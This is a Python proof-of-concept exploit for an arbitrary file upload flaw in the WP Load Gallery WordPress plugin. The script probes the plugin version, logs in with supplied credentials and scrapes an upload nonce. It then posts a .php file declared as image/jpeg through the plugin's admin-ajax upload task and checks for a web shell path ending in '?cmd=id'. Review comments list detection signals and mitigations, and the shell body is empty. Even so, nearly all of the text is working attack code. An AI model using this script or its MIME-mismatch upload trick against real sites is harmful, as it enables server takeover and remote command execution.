import requests
import re
import argparse

# by Nxploit | Khaled_alenazi
#
# Proof-of-concept for an arbitrary file upload in the "WP Load Gallery"
# WordPress plugin (the script's own gate treats "Stable tag" <= 2.1.6 as
# affected).  Flow: probe the plugin version from its public readme.txt,
# log in with the supplied WordPress credentials, scrape the plugin's
# upload nonce from the gallery admin page, then POST a file with a .php
# name through the plugin's admin-ajax upload task.
#
# NOTE(review) -- defender's view, derived only from the requests below:
#   * GET  /wp-content/plugins/wp-load-gallery/readme.txt        (version probe)
#   * POST /wp-login.php                                          (credentialed login)
#   * GET  /wp-admin/admin.php?page=wp-load-gallery               (nonce scrape)
#   * POST /wp-admin/admin-ajax.php  action=wpgallery, task=wplg_upload,
#          multipart field wplg_gallery_file[] whose filename ends in .php
#          while the declared part type is image/jpeg
#   * GET  /wp-content/uploads/2025/02/nxploit.php                (post-upload check)
#   A .php object appearing under wp-content/uploads, or an upload whose
#   declared MIME type disagrees with its file extension, is the actionable
#   signal.  Mitigation: update the plugin past the affected range and deny
#   PHP execution inside wp-content/uploads at the web-server layer.  The
#   upload requires a valid WordPress login, so credential hygiene and
#   login monitoring reduce exposure as well.

# ASCII-art banner; kept on one line because the original line breaks were
# lost in this copy.
banner = r""" _______ ________ ___ ___ ___ _____ ___ ____ ___ _ _ ___ / ____\ \ / / ____| |__ \ / _ \__ \| ____| |__ \|___ \ / _ \| || |__ \ | | \ \ / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) | | | \ \/ / | __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__ _/ / | |____ \ / | |____ / /_| |_| / /_ ___) | / /_ ___) | / / | |/ /_ \_____| \/ |______| |____|\___/____|____/ |____|____/ /_/ |_|____| """
print(banner)

# Silence urllib3 warnings (notably the one emitted for unverified HTTPS),
# then build one session so cookies persist across the login and upload.
requests.packages.urllib3.disable_warnings()
session = requests.Session()
# TLS certificate verification is disabled for every request on this session.
session.verify = False

parser = argparse.ArgumentParser(description="Exploit WP Load Gallery - Arbitrary File Upload")
parser.add_argument("-u", "--url", help="Target WordPress URL (e.g., https://example.com)", required=True)
parser.add_argument("-un", "--username", help="WordPress Username", required=True)
parser.add_argument("-p", "--password", help="WordPress Password", required=True)
args = parser.parse_args()

# Endpoint and payload constants.  All paths are relative to the site root.
url = args.url.rstrip('/')
login_url = f"{url}/wp-login.php"
gallery_url = f"{url}/wp-admin/admin.php?page=wp-load-gallery"
ajax_url = f"{url}/wp-admin/admin-ajax.php"
shell_filename = "nxploit.php"
# Hard-coded to the 2025/02 upload folder; presumably WordPress's year/month
# upload layout, so the final check only matches uploads made in that month.
shell_path = f"{url}/wp-content/uploads/2025/02/{shell_filename}"
# Body of the uploaded file.  Empty in this copy, so the PoC only demonstrates
# that a .php filename is accepted by the upload handler.
shell_content = ""
# Static browser-like User-Agent reused on every request; a fixed UA string is
# a weak but loggable fingerprint for this tool.
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
# Plugin readme.txt is world-readable and carries a "Stable tag:" line.
version_url = f"{url}/wp-content/plugins/wp-load-gallery/readme.txt"

# --- Step 1: version probe (best effort; failure does not abort) ----------
print("[+] Checking plugin version...")
version_response = session.get(version_url, headers={"User-Agent": user_agent})
if version_response.status_code == 200:
    version_match = re.search(r'Stable tag:\s*(\d+\.\d+\.\d+)', version_response.text)
    if version_match:
        version = version_match.group(1)
        print(f"[+] Detected version: {version}")
        # NOTE(review): this is a lexicographic str comparison, not a semantic
        # version comparison, so it misjudges multi-digit components (e.g.
        # "2.1.10" sorts before "2.1.6").  Do not treat this script's verdict
        # as an authoritative exposure check in either direction.
        if version <= "2.1.6":
            print("[+] The target is vulnerable! Proceeding with exploitation...")
        else:
            print("[!] The target is not vulnerable. Exiting.")
            # exit() is the site-module helper; sys.exit() is the conventional
            # call in scripts.
            exit()
    else:
        print("[!] Could not determine plugin version. Proceeding with caution.")
else:
    print("[!] Failed to fetch plugin version. Proceeding with caution.")

# --- Step 2: credentialed login -------------------------------------------
# The upload path below requires an authenticated WordPress session; the
# script cannot proceed without valid credentials.
login_data = {
    "log": args.username,
    "pwd": args.password,
    "rememberme": "forever",
    "wp-submit": "Log+In"
}
response = session.post(login_url, verify=False, data=login_data, headers={"User-Agent": user_agent})
# Login is judged solely by WordPress having set a wordpress_logged_in_* cookie.
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
    print("[+] Logged in successfully.")
else:
    print("[!] Failed to log in.")
    exit()

# --- Step 3: nonce scrape --------------------------------------------------
# Pulls the hidden "wplg_nonce" field from the gallery admin page.  Presumably
# a WordPress CSRF nonce: it protects against cross-site requests, not
# against an already logged-in user, so the session from step 2 is the real
# precondition here.
print("[+] Extracting wplg_nonce...")
response = session.get(gallery_url, headers={"User-Agent": user_agent})
wplg_nonce_match = re.search(r'"wplg_nonce"\s*value="(\w+)"', response.text)
if not wplg_nonce_match:
    print("[!] Failed to extract wplg_nonce.")
    exit()
wplg_nonce = wplg_nonce_match.group(1)
print(f"[+] Extracted wplg_nonce: {wplg_nonce}")

# --- Step 4: upload through the plugin's admin-ajax task -------------------
# The multipart part declares image/jpeg while the filename ends in .php;
# that mismatch is what a server-side extension/MIME check should reject.
files = {
    "wplg_gallery_file[]": (shell_filename, shell_content, "image/jpeg")
}
data = {
    "wplg_nonce": wplg_nonce,
    "action": "wpgallery",
    "wplg_gallery_id": "205",
    "task": "wplg_upload"
}
print("[+] Uploading shell...")
response = session.post(ajax_url, files=files, data=data, headers={"User-Agent": user_agent})
# Loose success heuristic: HTTP 200 plus the substring "status" anywhere in
# the body.  An error JSON containing "status" would also pass this test.
if response.status_code == 200 and "status" in response.text:
    print("[+] File uploaded successfully!")
    print(f"[+] Checking shell at: {shell_path}")
    # Confirms only that the hard-coded upload path answers 200, nothing more.
    shell_check = session.get(shell_path, headers={"User-Agent": user_agent})
    if shell_check.status_code == 200:
        print(f"[+] Shell is accessible at: {shell_path}?cmd=id")
    else:
        print("[!] Shell upload may have failed, check manually.")
else:
    print("[!] Upload failed, check the response manually.")